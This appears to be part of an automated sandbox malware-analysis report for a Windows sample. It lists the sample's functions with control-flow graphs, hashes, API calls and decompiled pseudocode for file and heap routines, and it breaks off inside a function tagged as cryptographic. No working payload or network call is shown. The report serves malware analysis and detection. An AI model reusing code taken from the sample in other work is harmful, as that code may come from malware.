                                                                                                                              • API String ID: 3030820695-3682587211
                                                                                                                              • Opcode ID: b8063a582d567822c8404439ad02ccdeac46dd66faa653608d309af936db62df
                                                                                                                              • Instruction ID: 6988f94406d167a92b31239773e8942e84e3e5aa0e7867387421cc16766de2a1
                                                                                                                              • Opcode Fuzzy Hash: b8063a582d567822c8404439ad02ccdeac46dd66faa653608d309af936db62df
                                                                                                                              • Instruction Fuzzy Hash: 02F09030604522AFEA216B68FD40ADF3AE4AF463507161133F814D22B1CB78CC87CA5D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00962B00 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 259COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1032 962b00-962b3a 1033 962b3c 1032->1033 1034 962b5b-962b60 1032->1034 1035 962d40-962d45 1033->1035 1036 962b62-962b67 1034->1036 1037 962bc0-962bc5 1034->1037 1040 962d47-962d4c 1035->1040 1041 962d90-962d95 1035->1041 1042 962c12-962c17 1036->1042 1043 962b6d-962b72 1036->1043 1038 962c4b-962c50 1037->1038 1039 962bcb-962bd0 1037->1039 1050 962c56-962c5b 1038->1050 1051 962d1b-962d2f 1038->1051 1044 962bd6-962bdb 1039->1044 1045 962cda-962d13 CreateFileW 1039->1045 1046 962d52-962d57 1040->1046 1047 962dd8-962ddd 1040->1047 1052 962e1f-962e24 1041->1052 1053 962d9b-962da0 1041->1053 1048 962b41-962b4a 1042->1048 1049 962c1d-962c22 1042->1049 1054 962cbf-962cd5 SetFilePointer 1043->1054 1055 962b78-962b7d 1043->1055 1060 962b50-962b55 1044->1060 1061 962be1-962c07 SetFilePointer 1044->1061 1045->1034 1056 962d19 1045->1056 1064 962d5d-962d62 1046->1064 1065 962e3a-962e50 1046->1065 1057 962eb3-962f15 1047->1057 1058 962de3-962de8 1047->1058 1048->1060 1049->1060 1066 962c28-962c40 1049->1066 1050->1060 1067 962c61-962cb4 1050->1067 1051->1034 1059 962d35-962d3f 1051->1059 1062 962f20-962f36 1052->1062 1063 962e2a-962e2f 1052->1063 1068 962da6-962dab 1053->1068 1069 962e5b-962e97 1053->1069 1071 962e9e-962ea8 1054->1071 1055->1060 1070 962b7f-962bb3 call 96fb4a 1055->1070 1056->1035 1057->1034 1081 962f1b 1057->1081 1058->1060 1075 962dee-962e14 1058->1075 1059->1035 1060->1034 1060->1035 1061->1034 1076 962c0d 1061->1076 1062->1034 1083 962f3c 1062->1083 1063->1060 1077 962e35-962f57 call 96fb8d 1063->1077 1064->1060 1072 962d68-962d72 1064->1072 1065->1034 1078 962e56 1065->1078 1066->1034 1079 962c46 1066->1079 1067->1034 1082 962cba 1067->1082 1068->1060 1073 962db1-962dcd 1068->1073 1069->1071 1087 962d77-962d7f 1070->1087 1071->1034 1080 962eae 1071->1080 1072->1087 1073->1034 1088 962dd3 1073->1088 1075->1034 1085 962e1a 1075->1085 1076->1035 1078->1035 1079->1035 1080->1035 1081->1035 1082->1035 1083->1035 1085->1035 1087->1034 1090 962d85 1087->1090 1088->1035 1090->1035
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: %A7U$%A7U$%A7U
                                                                                                                              • API String ID: 0-2460752236
                                                                                                                              • Opcode ID: 98ef04f0310c581a73c5db04b274d2a68b67eb9daac5b9aa65759a35da3764e6
                                                                                                                              • Instruction ID: a2e4f322b89f6e5c87e5c1a599c23a0982d3c5c31bc04c4f0ee7abde7a393223
                                                                                                                              • Opcode Fuzzy Hash: 98ef04f0310c581a73c5db04b274d2a68b67eb9daac5b9aa65759a35da3764e6
                                                                                                                              • Instruction Fuzzy Hash: D1A17B7020C7419FC719CF28889472EBBE1AB96700F248C4AF585EF3A1C675E9859B53
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 009649F0 Relevance: 9.5, APIs: 1, Strings: 5, Instructions: 539COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1092 9649f0-964a3b 1093 964a40-964a47 1092->1093 1094 964ad0-964ad6 1093->1094 1095 964a4d-964a53 1093->1095 1098 964b90-964b96 1094->1098 1099 964adc-964ae2 1094->1099 1096 964b30-964b36 1095->1096 1097 964a59-964a5f 1095->1097 1100 964c81-964c87 1096->1100 1101 964b3c-964b42 1096->1101 1102 964a65-964a6b 1097->1102 1103 964c0d-964c13 1097->1103 1104 964cb1-964cb7 1098->1104 1105 964b9c-964ba2 1098->1105 1106 964c51-964c57 1099->1106 1107 964ae8-964aee 1099->1107 1114 964e9f-964ea5 1100->1114 1115 964c8d-964c93 1100->1115 1108 964d8a-964d90 1101->1108 1109 964b48-964b4e 1101->1109 1112 964a71-964a7b 1102->1112 1113 964d59-964d5f 1102->1113 1122 964e14-964e1a 1103->1122 1123 964c19-964c1f 1103->1123 1118 964ef3-964ef9 1104->1118 1119 964cbd-964cc3 1104->1119 1116 964db6-964dbc 1105->1116 1117 964ba8-964bae 1105->1117 1110 964e73-964e79 1106->1110 1111 964c5d-964c63 1106->1111 1120 964af4-964afa 1107->1120 1121 964d11-964d17 1107->1121 1130 964d96-964d9e 1108->1130 1131 965274-965281 1108->1131 1126 964b54-964b5a 1109->1126 1127 964fc3-964ff2 1109->1127 1142 964e7f-964e87 1110->1142 1143 965308-965315 1110->1143 1140 96512f-965161 call 963e90 1111->1140 1141 964c69-964c71 1111->1141 1112->1093 1144 964a7d-964a83 1112->1144 1128 964d65-964d6d 1113->1128 1129 9651a8-9651ad 1113->1129 1147 96531a-965327 1114->1147 1148 964eab-964eb3 1114->1148 1145 965166-965191 call 963a30 1115->1145 1146 964c99-964ca1 1115->1146 1134 965286-9652ab call 964100 1116->1134 1135 964dc2-964dca 1116->1135 1132 964bb4-964bba 1117->1132 1133 96504d-9650cc call 972cb7 call 965370 1117->1133 1151 964eff-964f07 1118->1151 1152 96532c-965339 1118->1152 1149 965196-9651a3 1119->1149 1150 964cc9-964cd1 1119->1150 1153 964b00-964b06 1120->1153 1154 964f31-964f87 1120->1154 1124 96534f-96536b call 96fb8d 1121->1124 1125 964d1d-964d25 1121->1125 1138 964e20-964e28 1122->1138 1139 9652de-965303 call 963e90 1122->1139 1136 964c25-964c2b 1123->1136 1137 96510b-965118 1123->1137 1125->1093 1168 964d2b-964d54 call 9631c0 1125->1168 1155 964ff7-965048 1126->1155 1156 964b60-964b68 1126->1156 1127->1093 1128->1093 1169 964d73-964d85 1128->1169 1165 9651c0-9651c8 1129->1165 1130->1093 1170 964da4-964db1 1130->1170 1131->1093 1158 964bc0-964bc8 1132->1158 1159 9650d1-965106 call 963a30 1132->1159 1133->1093 1197 9652b0-9652d9 1134->1197 1135->1093 1171 964dd0-964de0 1135->1171 1160 964c31-964c39 1136->1160 1161 96511d-96512a 1136->1161 1137->1093 1138->1093 1173 964e2e-964e6e call 963a30 1138->1173 1139->1093 1140->1093 1141->1093 1163 964c77-964c7c 1141->1163 1142->1093 1175 964e8d-964e9a 1142->1175 1143->1093 1176 964f1f-964f2c 1144->1176 1177 964a89-964a91 1144->1177 1145->1093 1146->1093 1166 964ca7-964cac 1146->1166 1147->1093 1148->1093 1179 964eb9-964ecf call 963a30 1148->1179 1149->1093 1150->1093 1167 964cd7-964d0c call 963a30 1150->1167 1151->1093 1180 964f0d-964f1a 1151->1180 1152->1093 1181 964f8c-964fbe call 963e90 1153->1181 1182 964b0c-964b14 1153->1182 1154->1093 1155->1093 1156->1093 1185 964b6e-964b83 1156->1185 1158->1093 1187 964bce-964c08 1158->1187 1159->1093 1160->1093 1189 964c3f-964c4c 1160->1189 1161->1093 1163->1093 1192 9651f0-9651f5 1165->1192 1193 9651ca-9651cf 1165->1193 1166->1093 1167->1093 1168->1093 1169->1093 1170->1093 1196 964de5-964e01 1171->1196 1173->1093 1175->1093 1176->1093 1177->1093 1200 964a93-964ac5 1177->1200 1214 964ed4-964eee 1179->1214 1180->1093 1181->1093 1182->1093 1183 964b1a-964b27 1182->1183 1183->1093 1185->1196 1187->1093 1189->1093 1209 9651f7-9651fc 1192->1209 1210 965230-965237 1192->1210 1206 965210-965215 1193->1206 1207 9651d1-9651d6 1193->1207 1212 964e04-964e0f 1196->1212 1197->1093 1200->1212 1220 965217-96521e 1206->1220 1221 965261-96526f CloseHandle 1206->1221 1216 9651af-9651be 1207->1216 1217 9651d8-9651df 1207->1217 1218 9651fe-965205 1209->1218 1219 96524b-96525c 1209->1219 1210->1165 1222 965239-965240 1210->1222 1212->1093 1214->1093 1216->1165 1217->1165 1223 9651e1-9651e6 1217->1223 1218->1165 1224 965207-96520c 1218->1224 1219->1165 1220->1165 1225 965220-96522e call 96fb7a 1220->1225 1221->1165 1222->1165 1226 965246-96534a 1222->1226 1223->1165 1224->1165 1225->1165 1226->1093
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: N<tb$N<tb$cke_$cke_$cke_
                                                                                                                              • API String ID: 0-4011413948
                                                                                                                              • Opcode ID: 2eb1257ce175756ed464116f1ebf10f482945f88eae1d22a330fd9aea6e7150c
                                                                                                                              • Instruction ID: 4858602a177e4a72063b846fbcfd4ea066bb3037328d0711fff8beb082ba2a93
                                                                                                                              • Opcode Fuzzy Hash: 2eb1257ce175756ed464116f1ebf10f482945f88eae1d22a330fd9aea6e7150c
                                                                                                                              • Instruction Fuzzy Hash: 5612D47064C3419BCB38CEA89890B3E76E5AFD6314F24492EE457DB790E634CC40AB87
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00963570 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 203COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1364 963570-9635aa 1365 963607-96360c 1364->1365 1366 9635ac 1364->1366 1368 963612-963617 1365->1368 1369 9636c0-9636c5 1365->1369 1367 963640-963645 1366->1367 1374 9636f0-9636f5 1367->1374 1375 96364b-963650 1367->1375 1372 96372f-96376e 1368->1372 1373 96361d-963622 1368->1373 1370 9637c7-963802 1369->1370 1371 9636cb-9636d0 1369->1371 1370->1365 1385 963808 1370->1385 1376 9636d6-9636db 1371->1376 1377 96380d-963843 ReadFile 1371->1377 1372->1365 1382 963774 1372->1382 1380 963628-96362d 1373->1380 1381 963779-9637a9 call 9710e0 1373->1381 1378 96384e-96385b 1374->1378 1379 9636fb-963700 1374->1379 1383 963656-96365b 1375->1383 1384 9637ae-9637bc 1375->1384 1386 963600-963605 1376->1386 1387 9636e1-963889 call 96fb8d 1376->1387 1377->1365 1388 963849 1377->1388 1389 96385f-963869 1378->1389 1379->1386 1390 963706-963724 1379->1390 1380->1386 1391 96362f-96363d 1380->1391 1381->1389 1382->1367 1393 9635b1-9635fa 1383->1393 1394 963661-963666 1383->1394 1384->1365 1395 9637c2 1384->1395 1385->1377 1386->1365 1386->1367 1388->1378 1389->1365 1397 96386f 1389->1397 1390->1365 1398 96372a 1390->1398 1391->1365 1399 96363f 1391->1399 1393->1386 1394->1386 1401 963668-9636b8 1394->1401 1395->1367 1397->1367 1398->1367 1399->1367 1401->1365 1403 9636be 1401->1403 1403->1367
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0yV$0yV$0yV
                                                                                                                              • API String ID: 0-1924854009
                                                                                                                              • Opcode ID: 481d74dfd5b5b8c092a7396a79325bb6363e607884ab71f4554c6000a4f2553a
                                                                                                                              • Instruction ID: 11a4a96555ac067410b07cebf65c4bfe0382aacf21ef55d0618d3366f6faee00
                                                                                                                              • Opcode Fuzzy Hash: 481d74dfd5b5b8c092a7396a79325bb6363e607884ab71f4554c6000a4f2553a
                                                                                                                              • Instruction Fuzzy Hash: 39719A756092029F8704CF28C9C292EBBE5BF9D760F24891EF995D7361C331EE588B52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 009631C0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 222COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1405 9631c0-963254 1406 963270-963277 1405->1406 1407 9632c0-9632c6 1406->1407 1408 963279-96327f 1406->1408 1411 963340-963346 1407->1411 1412 9632c8-9632ce 1407->1412 1409 963300-963306 1408->1409 1410 963281-963287 1408->1410 1419 96330c-963312 1409->1419 1420 963428-963430 1409->1420 1413 9633be-9633c4 1410->1413 1414 96328d-963293 1410->1414 1415 963455-96345b 1411->1415 1416 96334c-963352 1411->1416 1417 9632d4-9632dc 1412->1417 1418 9633f1-9633f7 1412->1418 1429 9634cc-9634d7 1413->1429 1430 9633ca-9633d4 1413->1430 1423 963256-96326c 1414->1423 1424 963295-96329b 1414->1424 1415->1423 1428 963461-963469 1415->1428 1426 9634bb-9634c7 1416->1426 1427 963358-96335e 1416->1427 1417->1406 1431 9632de-9632e4 1417->1431 1432 9633fd-963407 1418->1432 1433 9634eb 1418->1433 1421 9634aa-9634b6 1419->1421 1422 963318-963320 1419->1422 1420->1406 1425 963436-96343c 1420->1425 1421->1406 1422->1406 1435 963326-96332e 1422->1435 1423->1406 1441 963480-963487 1424->1441 1442 9632a1-9632a9 1424->1442 1443 963442-96344a 1425->1443 1444 9634fc-963529 1425->1444 1426->1406 1437 963534-963540 1427->1437 1438 963364-96336c 1427->1438 1428->1406 1445 96346f-96347b 1428->1445 1434 9634d8-9634e6 SetFilePointer 1429->1434 1430->1406 1439 9633da-9633e2 1430->1439 1446 9632ea-9632f2 1431->1446 1447 963489-96349a 1431->1447 1432->1406 1440 96340d-963415 1432->1440 1436 9634ef-9634f7 1433->1436 1434->1406 1435->1406 1448 963334-963339 1435->1448 1436->1406 1437->1406 1451 963546-96354b 1437->1451 1438->1406 1452 963372-96339f 1438->1452 1439->1406 1453 9633e8-9633ec 1439->1453 1440->1406 1454 96341b 1440->1454 1441->1436 1442->1406 1455 9632ab-9632b4 1442->1455 1443->1406 1456 963450-963565 call 96fb8d 1443->1456 1449 9633a1 1444->1449 1450 96352f 1444->1450 1445->1406 1446->1406 1458 9632f8-9632fa 1446->1458 1447->1406 1457 9634a0-9634a5 1447->1457 1448->1406 1459 9633a6-9633b9 1449->1459 1450->1459 1451->1406 1452->1449 1452->1459 1453->1406 1460 96341d-963423 1454->1460 1455->1406 1461 9632b6-9632bb 1455->1461 1457->1406 1458->1460 1459->1406 1460->1434 1461->1406
                                                                                                                              APIs
                                                                                                                              • SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?,?,9CC58AEB,00964123,?,00000000,00000002), ref: 009634DB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FilePointer
                                                                                                                              • String ID: =zp$=zp
                                                                                                                              • API String ID: 973152223-1287770534
                                                                                                                              • Opcode ID: 4efa82b76a2becba7159285e38f2f1ac553ab9f215d22145802b5624df0970f6
                                                                                                                              • Instruction ID: 84678c14af680617292fc2966bb3d3138b7b9396608ea254c4fb445e3142e12d
                                                                                                                              • Opcode Fuzzy Hash: 4efa82b76a2becba7159285e38f2f1ac553ab9f215d22145802b5624df0970f6
                                                                                                                              • Instruction Fuzzy Hash: 2B71E3717186019BCF2CCA6C94F163AB2E5BF95700F64C91EF456CBB60D626DE488783
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0096FB4A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1465 96fb4a-96fb4d 1466 96fb5c-96fb5f call 972cb7 1465->1466 1468 96fb64-96fb67 1466->1468 1469 96fb4f-96fb5a call 971ee1 1468->1469 1470 96fb69-96fb6a 1468->1470 1469->1466 1473 96fb6b-96fb6f 1469->1473 1474 96fcc5-96fcf5 call 96fc75 call 970865 IsProcessorFeaturePresent 1473->1474 1475 96fb75-96fcc4 call 96fc31 call 970865 1473->1475 1486 96fcf7-96fcfa 1474->1486 1487 96fcfc-96fddb call 96fddc 1474->1487 1475->1474 1486->1487
                                                                                                                              APIs
                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0096FCED
                                                                                                                              • ___raise_securityfailure.LIBCMT ref: 0096FDD5
                                                                                                                                • Part of subcall function 00970865: RaiseException.KERNEL32(E06D7363,00000001,00000003,0096FCE1,?,?,?,?,0096FCE1,00000020,009836B4,00000020), ref: 009708C5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFeaturePresentProcessorRaise___raise_securityfailure
                                                                                                                              • String ID: 32*
                                                                                                                              • API String ID: 3749517692-570674726
                                                                                                                              • Opcode ID: b98dc17a3392ac64d0593427fe5d6d04f306f710e34d570fe8c215b926fc812f
                                                                                                                              • Instruction ID: 567e854c564196dde0be687591ee11e581acd3d121f69f1aa8ef8d76c10c76af
                                                                                                                              • Opcode Fuzzy Hash: b98dc17a3392ac64d0593427fe5d6d04f306f710e34d570fe8c215b926fc812f
                                                                                                                              • Instruction Fuzzy Hash: BA318D7552920AEBC700DF69FD56B887BBCBF44300F10802AE958C73E1EBB4A544DB84
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00962F60 Relevance: 3.2, APIs: 2, Instructions: 151COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7a9478868466c078593fc4fcc016db231e140b08f4194e6d952f6d96078b0976
                                                                                                                              • Instruction ID: 73c2b685df5aeec70317f1a20776545af9de1faeb4ec886ba98339ac44b85073
                                                                                                                              • Opcode Fuzzy Hash: 7a9478868466c078593fc4fcc016db231e140b08f4194e6d952f6d96078b0976
                                                                                                                              • Instruction Fuzzy Hash: BE516B3520CA066FDA3C4F64966433ABBEA9F95751F30C22ED5264B7D0C7F58D409782
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00423ED7 Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00423ED7(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x43c844 = _t6;
				if(_t6 != 0) {
					_t7 = E00423E7C(__eflags);
					__eflags = _t7 - 3;
					 *0x43cdb8 = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E004240D8(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x43c844);
							 *0x43c844 =  *0x43c844 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}






                                                                                                                              0x00423ee8
                                                                                                                              0x00423ef0
                                                                                                                              0x00423ef5
                                                                                                                              0x00423efa
                                                                                                                              0x00423eff
                                                                                                                              0x00423f02
                                                                                                                              0x00423f07
                                                                                                                              0x00423f2d
                                                                                                                              0x00423f2f
                                                                                                                              0x00423f30
                                                                                                                              0x00423f09
                                                                                                                              0x00423f0e
                                                                                                                              0x00423f13
                                                                                                                              0x00423f16
                                                                                                                              0x00000000
                                                                                                                              0x00423f18
                                                                                                                              0x00423f1e
                                                                                                                              0x00423f24
                                                                                                                              0x00000000
                                                                                                                              0x00423f24
                                                                                                                              0x00423f16
                                                                                                                              0x00423ef7
                                                                                                                              0x00423ef7
                                                                                                                              0x00423ef9
                                                                                                                              0x00423ef9

                                                                                                                              APIs
                                                                                                                              • HeapCreate.KERNEL32(00000000,00001000,00000000,0041C6C0,00000001), ref: 00423EE8
                                                                                                                              • HeapDestroy.KERNEL32 ref: 00423F1E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$CreateDestroy
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3296620671-0
                                                                                                                              • Opcode ID: d2b4e6cdf4d15f094c8418882b2b8b8dc061e0f2c4b5ab1cdbf71f5fe9a2af28
                                                                                                                              • Instruction ID: e07f15de74d329385c4e4dd9262f47b7a9e2ee741c83819ef539e40b111d02f3
                                                                                                                              • Opcode Fuzzy Hash: d2b4e6cdf4d15f094c8418882b2b8b8dc061e0f2c4b5ab1cdbf71f5fe9a2af28
                                                                                                                              • Instruction Fuzzy Hash: 48E06D72B143109AEB58AF34BE4672639F4E784747F51143BF505D50A0EBBC8688960C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0097651E Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,00000020,00000000,?,00974A01,00000001,00000364,00000008,000000FF,?,00976497,009765BE,?,?,0096FB64,?), ref: 0097655F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1279760036-0
                                                                                                                              • Opcode ID: bd308d273ce149ba5765028b7807de12ed63849f1d076aaf467c41875ee675fe
                                                                                                                              • Instruction ID: 99237e0466c0ff5bc12b77434c6caa1b82130308ad996558e4a6feafe5935c16
                                                                                                                              • Opcode Fuzzy Hash: bd308d273ce149ba5765028b7807de12ed63849f1d076aaf467c41875ee675fe
                                                                                                                              • Instruction Fuzzy Hash: E0F0E933514E25A7DB219B269C05B5B3B4DAF81B70B15C511BC0DA61A9CA20DD11F6A4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0097657B Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,0096FB64,?,?,00962B95,00000020,?), ref: 009765AD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1279760036-0
                                                                                                                              • Opcode ID: 1f481b0ee1c6a6a6992cbc72b1dcbf41b9b89915b5cba4014a4e53c2e620a2f6
                                                                                                                              • Instruction ID: b1d86d4cd019754ff4f3121c4a1772382511e8ca80697d746b0704dcc1122356
                                                                                                                              • Opcode Fuzzy Hash: 1f481b0ee1c6a6a6992cbc72b1dcbf41b9b89915b5cba4014a4e53c2e620a2f6
                                                                                                                              • Instruction Fuzzy Hash: 1DE09237514E226BEB2127A59C05B6B7B8CAF837B0F15C124FC0D961A5EB60DC01F2E1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00972C9C Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _free.LIBCMT ref: 00972CAF
                                                                                                                                • Part of subcall function 00975822: RtlFreeHeap.NTDLL(00000000,00000000,?,00976460,?,00000000,?,?,?,0097636B,?,00000007,?,?,00976BE8,?), ref: 00975838
                                                                                                                                • Part of subcall function 00975822: GetLastError.KERNEL32(?,?,00976460,?,00000000,?,?,?,0097636B,?,00000007,?,?,00976BE8,?,?), ref: 0097584A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorFreeHeapLast_free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1353095263-0
                                                                                                                              • Opcode ID: dcd858d43cbb79e18f32c4dab96ee2079e0138076906b1019117545516b91292
                                                                                                                              • Instruction ID: b64024ab0e4d4092af541ed130cbee91779c9195ee116bcec3f5bc94c5ef84bf
                                                                                                                              • Opcode Fuzzy Hash: dcd858d43cbb79e18f32c4dab96ee2079e0138076906b1019117545516b91292
                                                                                                                              • Instruction Fuzzy Hash: 57C04C72500208BBDB059B45D906B8E7FA9DB80364F218054F41557251DBB2EE449691
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Non-executed Functions

                                                                                                                              Function 00401060 Relevance: 116.9, APIs: 45, Strings: 21, Instructions: 1398COMMONCrypto
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 45%
                                                                                                                              			E00401060(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t438;
				signed int _t440;
				signed int _t443;
				void* _t447;
				intOrPtr _t450;
				void* _t451;
				signed int _t452;
				signed int _t453;
				void* _t458;
				signed int _t460;
				void* _t463;
				signed int _t465;
				void* _t468;
				signed int _t470;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				intOrPtr _t475;
				signed int _t477;
				signed int _t481;
				signed int _t484;
				void* _t486;
				signed int _t488;
				signed int _t489;
				signed int _t498;
				signed int _t499;
				signed int _t500;
				signed int _t509;
				signed int* _t511;
				signed int _t514;
				void* _t517;
				signed int _t522;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t544;
				signed int* _t546;
				signed int _t549;
				signed int _t556;
				signed int _t557;
				intOrPtr _t559;
				signed int _t563;
				signed int _t564;
				signed int _t566;
				signed int _t571;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				signed int _t586;
				signed int _t588;
				signed int _t589;
				signed int _t590;
				signed int _t606;
				signed int _t607;
				signed int _t608;
				signed int _t612;
				signed int _t626;
				signed int _t627;
				signed int _t628;
				signed int _t642;
				signed int* _t644;
				signed int _t647;
				signed int _t654;
				signed int _t655;
				signed int _t657;
				intOrPtr _t658;
				signed int _t662;
				signed int _t663;
				signed int _t665;
				signed int _t670;
				void* _t671;
				long _t673;
				signed int _t674;
				signed int _t675;
				signed int _t686;
				long _t688;
				signed int _t689;
				signed int _t690;
				long _t706;
				signed int _t707;
